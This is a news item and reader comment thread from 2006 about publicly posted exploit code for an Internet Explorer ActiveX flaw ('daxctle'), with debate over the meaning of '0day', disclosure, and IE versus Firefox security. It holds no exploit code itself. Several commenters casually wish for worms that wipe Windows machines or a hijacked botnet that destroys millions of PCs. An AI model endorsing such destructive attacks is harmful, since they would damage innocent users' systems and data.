Code Posted For New IE Exploit

PC World is reporting that two days ago hackers posted code for a new vulnerability in Internet Explorer that could allow drive-by takeover of a vulnerable PC. Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild, but they are taking the new threat seriously. Symantec calls the bug "critical" and Secunia rates it highly critical, the most severe rating. The hackers who posted the sample code, xsec.org, refer to it as a "0day" exploit. The article quotes another security expert who calls this label "a stretch." Update: 09/17 18:00 GMT by C :Fixed link to XSec. Thanks for pointing that one out, folks.

Wrong Link in Subject

[Anonymous Coward]

That's xsec.org [xsec.org] not xsec.com

Moo

[Chacham (981)]

Another ActiveX exploit. *yawn*

If you want to be safe in IE, turn off ActiveX from untrusted sites. Hasn't this been known since day one?

News would be if ActiveX was tested and found to be safe.

Re:

[vhogemann (797994)]

A better alternative would be not use IE at all.

I know most users just don't care, or don't know better. But what about developers and companies? These should be treating IE like a plague, and using it only when there's no other suitable alternatives, on a sandboxed environment.

I used to care about IE compatibility when I designed my pages... but not anymore. I realized that most business already expect some kind of requirements for the software you sell or build for them, mine is a modern browser, with dec

Re:how to detect an untrusted site ..

[SLi (132609)]

Huh? If you don't have any specific reason to trust it, it's untrusted. I would have thunk that's Internet 101.

Re:

[Tim C (15259)]

How do you know what is or is not an untrusted site.

That's easy. If you have to ask yourself "do I trust this site?" then the answer is no.

Re:

[trezor (555230)]

Switch to Linux and watch all my applications which I need to do my job fail. Yes, that sounds like a plan. For the record I'm a .NET developer who needs Visual Studio and SQL Server to do my work.

You may find it hard to believe but Windows is a pretty damn secure OS, given that the one using it knows what he's doing. I'm not using MSIE, I'm not using Windows Media Player. And I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unrespons

Re:

[Millenniumman (924859)]

I'm sorry, but you're wrong. Linux is much more secure for most users. If you can't install the OS, and use it, you won't have any security problems.

Re:

[NoTheory (580275)]

yes, and you can reduce your risk of car accidents by moving into the middle of the sahara desert. The statement may be true, but it's not very useful. As for grandparent, so you develop w/ .NET, that's great for you too. I believe that VS is in the WINE list of apps. You've picked your platform, but that doesn't mean that you've got rock-solid justification for it. Ultimately the platform you pick is about your laziness, and what you want to be lazy about.

Since /.'s already turned into bugtraq...

[mobby_6kl (668092)]

why not post these:

Linux Kernel SMBFS CHRoot Security Restriction Bypass [securityfocus.com]
Linux Kernel SCTP Multiple Remote Denial of Service [securityfocus.com]
Apple Mac OS X KExtLoad Format String Weakness [securityfocus.com]
Mozilla Firefox JavaScript Handler Race Condition Memory Corruption Vulnerability [securityfocus.com]

Re:Since /.'s already turned into bugtraq...

[elronxenu (117773)]

Perhaps because the first bug you mentioned was posted 4 months ago, you can resolve it by upgrading your kernel, and almost nobody would run an application chrooted under an SMBFS network filesystem anyway.

The second bug is only a DOS, it won't give an attacker sweet r00t permissions. And it's also 4 months old news.

The third bug doesn't result in any privilege escalation because the kextload program isn't setuid, you'd need to find some other vulnerability in a program which uses kextload.

And the fourth bug is a month old already, hasn't been proven to be exploitable (more likely to simply crash firefox), and is easily resolved by upgrading firefox.

Re:

[Millenniumman (924859)]

You're merely jealous that you don't have excellent karma. :D

September 13, not September 15

[Infosec Geek (930840)]

Since this was dated September 17, make that four days ago, not two.

Check the date on the xsec.org page referred to, daxctle2.c [xsec.org]. milw0rm 2358 [milw0rm.org] was a re-publication of this, also posted up on 09/13/2006. Republication happened at other exploit advisory sites as well, such as the SecuriTeam(TM) site, where, for some strange reason, the exploit was published twice, redundantly.

The formal vulnerability advisories SA21910 [secunia.com] and FrSIRT/ADV-2006-3593 [frsirt.com], from Secunia and FrSIRT respectively, posted on 09/14/2006

Re:

[RAMMS+EIN (578166)]

``the exploit was published twice, redundantly''

And you are repeating yourself, twice, redundantly, saying the same thing multiple times without adding new information. ;-)

"not a 0day exploit"

[wfberg (24378)]

The reason it's not a 0day exploit is because some other dude already discovered the vulnerability, but didn't disclose it to the public? And that second guy is sitting on another 3 or 4 vulnerabilities?

I'm sorry, what's the definition of 0day exploit these days? If not exploit code for which there is no patch available, then what?

Can we now use "responsible disclosure" to argue away the fact that actual computer systems are at risk of being exploited right here and now, by saying "yeah, well, you got rooted and all, but we knew about that bug, so it doesn't count, even though we don't have a patch yet."?

Can we now take comments that the programmers left in the code ("// does this work?" "/* coded while druk */" "//BUGBUG") as an excuse to completely ignore actual vulnerabilities?

And hey, if TWO researches come up with this vulnerability seemingly independently, what are the chances of the exploit already circulating in the black hat community? Close to 100%?

By my definition you've got your negative-day and your zero-day exploits. Negative-day exploits; no patch yet. Zero-day; the patch has just been issued, so might as well give your exploit to scriptkiddies and botnet operators to use on the systems that don't patch early/often enough. Obviously, a negative-day exploit usually isn't going to be used on a large scale, because your average blackhatter wants to keep it in his toolkit to attack well-patched systems; after all, it's what gives him (and his leet skillz) an edge. Once patchday arrives, you might as well give it to some noobs, because they might be interested in unpatched targets, while a leet blackhatter is not.

So no, it's not a "stretch" to call it 0day. It's negative day, even.

Re:

[n0-0p (325773)]

I think your definition of zero day is ops-centric, and not security-centric. In this post [slashdot.org] I give the generally accepted definition in the security community, which agrees with Moore's statement. To summarize, the security community only uses 0-day to refer to undisclosed vulnerabilities, and it does not address patch lag.

Re:

[wfberg (24378)]

Undisclosed to whom? The second guy seemed to be sitting on the vulnerability. He might've disclosed to Microsoft, but has the public learned of this vulnerability before? If not, they can't be taking any precautions.

Re:

[n0-0p (325773)]

I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests reveal that he's sitting on vulnerabilities unless he intends to disclose them soon. So he may be practicing responsible disclosure and allowing the vendor a reasonable amount of time to complete a patch. Or he may have other reasons for waiting.

Security disclosure in general is a pretty complicated ga

Re:

[spinja (994674)]

The reason I don't consider it "0day" is that a public tool exists that will discover this bug in its default configuration (AxMan). Anyone who took the time could run the tool, discover the bug, and write the exploit. The tool was released on August 1st and this particular bug was reported to Microsoft in late July. Since all of this information was *widely* publicized at the time of release ( a couple dozen articles on AxMan [blogspot.com] ), I have hard time considering any of the bugs it turns up "0day" in the normal

Does not affect IE7

[I'm Don Giovanni (598558)]

This does not affect IE7:
http://blogs.msdn.com/ie/archive/2006/09/15/756736 .aspx [msdn.com]

(Just for edification. ;-))

Re:

[rs232 (849320)]

Yea, by disabling ActiveX and removing Direct Animation. But does that actually fix the defects in the controls themselves.

Re:

[The MAZZTer (911996)]

I tried a bunch of ActiveX vulnerabilities for IE6 in IE7. Some didn't even work in IE6 (probably because I didn't have Office or some other MS ActiveX controls). Only 2 out of 15-20 worked in IE7.

Re:Yes, this affects IE7 but you are prompted

[Psykechan (255694)]

Your link points out that IE7 is vulnerable but it will prompt you to run the ActiveX control before hosing your system. From the average user's point of view, they get a message asking to run something created and signed by Microsoft for the page to load. Tell me how many average users, even the relatively computer saavy, will allow the control to run?

Throwing a constant barrage of OS/browser security pop-ups on the screen does not make it secure. Making it so that at exploitable control can be completely removed and not just "effectively removed" from the system helps make the system more secure but this is just a workaround. If the control was designed to be able to grant system level privileges to a web page than it's time to go back to the proverbial drawing board.

If it wasn't designed that way, then patch it when you first hear about it over a month ago [securityfocus.com] and stop complaining about people releasing it to the public. I would rather have everyone know about it than have just Microsoft, a few security people, and several black hats knowing.

Real Damage

[nurb432 (527695)]

what ever happened to exploits ( be it virus, trojan, whatever ) that cased some REAL damage?

All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

Re:

[(H)elix1 (231155)]

what ever happened to exploits ( be it virus, trojan, whatever ) that cased some REAL damage?

3. Profit. Folks found there was money to be made off of a bot net under your control. Not uncommon to see an infected system patch itself so others can't infect the system.

Profit

[nurb432 (527695)]

There has to be some evil person out there that hasnt sold out to the man... In my day, it was the challenge of doing someting that drove us, not the recognition.. ( be it money or peers )

Re:

[liquidpele (663430)]

I always wanted to infect an entire botnet with something that overwrote the bootsector with code that didn't boot windows, just printed "This computer was infected with A Virus and was caught attacking other computers online. Your computer has now been disabled, see a computer technician to fix this and clean the virus off your machine." That way their info is still safe, but they can't boot windows to start the bot anymore.

Re:kills windows

[canuck57 (662392)]

All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it

Since when is 0-day open to interpretation?

[shaitand (626655)]

Either they released the exploit code before the hole was patched or not.

The real difference between Firefox and MSIE

[Myria (562655)]

If you look at Firefox security bugs and IE security bugs, you'll see that there are more Firefox bugs than MSIE bugs in the exploit lists. There is, however, a big difference.

When Microsoft finds a security hole themselves, they don't tell anyone, and they don't release a patch. They fix it in the tree for the next release of the OS. The only time they release a patch is when someone else finds the bug. The reason they do this is because if they release a patch, people will "bindiff" it against the previous version and find what is changed so that they can make exploits to use against unpatched users. You can't realistically "bindiff" XP vs. Vista, so they can obscure their security updates inside Vista.

Firefox instead will issue patches no matter who finds them. This is why Firefox appears to have more bugs - you always see them get fixed.

Melissa

Plugin for IE

[univgeek (442857)]

Or whatever they are called.

Why do people use IE? Mostly because of Intranet sites which server up IE only content and work badly or not-at-all with other browsers. How 'bout an IE plugin which opens only Intranet/trusted sites in IE and opens all else in an external safe browser? Or is this unlikely to be useful?

Re:

[CRCulver (715279)]

Funny you use Emacs-W3M in your "IE alternative" joke. It was recently removed from Gentoo because it is unmaintained and may not work with future versions of Emacs.

Re:Eh?

[LaughingCoder (914424)]

OK, I'll answer the question. About 75% of web users still use IE.

If you are a sys admin, or a web admin, Deal.

Re:

[makomk (752139)]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit?

Key word: fixing. As far as I can tell, this security hole is currently unpatched.

Re:

[jiushao (898575)]

Granted, now they are fixed, but the exploits were known for at least several days before the update was made available (and another few days before the automatic updates picks up on it). Similiarly we can probably expect a Microsoft patch within a week (as has been the typical delay for more critical problems for some time, granted, the WMF exploit took 9 days, but that unfortunately happened during the holidays).

Re:Firefox 1.5.07?

[Pecisk (688001)]

Propably because there is code in the wild for this exploit and bug itself is still unfixed?

Re:

[RonnyJ (651856)]

That's contrary to what the second line in the summary says, though you've still been modded up despite posting no evidence to back your claim up.

Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

You can make an exploit if you want to

[MarkByers (770551)]

Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

But code that could be used to create an exploit has been posted, which is what I think GP was referring to.

winpologists out in force

[rs232 (849320)]

Slashdot has done stories on bugs in Firefox. See ..

Slashdot | 611 Defects, 71 Vulnerabilities Found In Firefox [slashdot.org]

Firefox Analyzed for Bugs by Software [slashdot.org]

Spyware Disguises Itself as Firefox Extension [slashdot.org]

I'v also noticed how the same kind of comments from the Winpologists get modded up very quickly.

was Re:Firefox 1.5.07?

Re:

[jiushao (898575)]

There is no apologizing for exploits, it is bad whoever has them. On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

Re:

[rs232 (849320)]

Yea, "On the other hand .." lets not talk about bugs in IEXPlorer.

That RSA exploit probably appears elsewhere...

[tjwhaynes (114792)]

On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

If you are interested in the work on RSA signatures, check out this OpenPGP posting [imc.org]. The chances are that there are other RSA signature implementations out there that are vulnerable to this sort of subversion and it will be interesting to see what other products actually publish fixes an

Re:Firefox 1.5.07?

[Wylfing (144940)]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits comes off as pure Microsoft-hate masturbation.

OK, smarty, I will explain the difference to you. On one hand we have Firefox, which is a piece of software that is free in both senses, and you can use it, or not use it, or delete from your system, or whatever you want. On the other hand we have Internet Explorer, which is forced upon you via "leveraging," you cannot remove, and you must use because of contrived tie-ins to fundamental system functions.

If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it. Hell, there are plenty of applications and services that will gleefully launch IE of their own accord and start loading internets from God knows where, and there's no way for me to stop it. Because of Microsoft's predatory practices, I have no choice in the matter (except to abandon Windows altogether, which is also not an option -- see how all my choices have been removed?). You're damn right people are a lot more upset when exploits turn up in IE. We are required to suffer the fallout from them.

Re:

[RonnyJ (651856)]

You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

Sure, you can talk all you like about Firefox and other browsers being optional, etc., but that's not the issue being raised.

Re:

[cloudmaster (10662)]

Someone else already mentioned that Firefox bugs actually get *fixed*, and often don't have exploits available until after they're disclosed.

This bug is with a required piece of system software that you can't turn off, *and* it's not fixed yet, *and* there is a working exploit available. If you can think of other similar situations that aren't reported, please, feel free to submit them. Otherwise, your apples don't belong in this orange tree.

Re:

[ultranova (717540)]

You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

Slashdot covers IE security issues more often than Firefox security issues because IE gets new exploits much more often than Firefox, and since IE is used in a lot more machines than Firefox, IE security issues have far more potential for destruction than Firefox security issues, making them more ne

Re:

[suv4x4 (956391)]

If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it.

I'm getting tired of explainint this, but here we go again: do you notice the shiny E on your desktop? This is IE. Now, if you're thinking of double clicking

Re:

[RonnyJ (651856)]

The presence of this news item doesn't show bias.

However, I would suggest that the lack of news items regarding security flaws in Firefox does show bias.

Re:

[jiushao (898575)]

Sure, after a week of them being public knowledge (a few days for the fix to turn into a release, another few for the release to get out the door), which, coincidentally, is largely the same turnaround that Microsoft has had on serious flaws as of late.

Re:

[n0-0p (325773)]

A 0-day refers to an undisclosed vulnerability; however, some people have stretched the definition to mean unpatched vulnerability. It's considered a stretch because an unpatched vulnerability is still known, so precautions can be taken. With a true 0-day vulnerability/exploit, you would have no knowledge of the issue and no way of protecting specifically against it.

Re:

[rolandog (834340)]

In capitalist America, your computer can have 'safe sex' by using the Firefox condom and taking the 'NoScript' pill.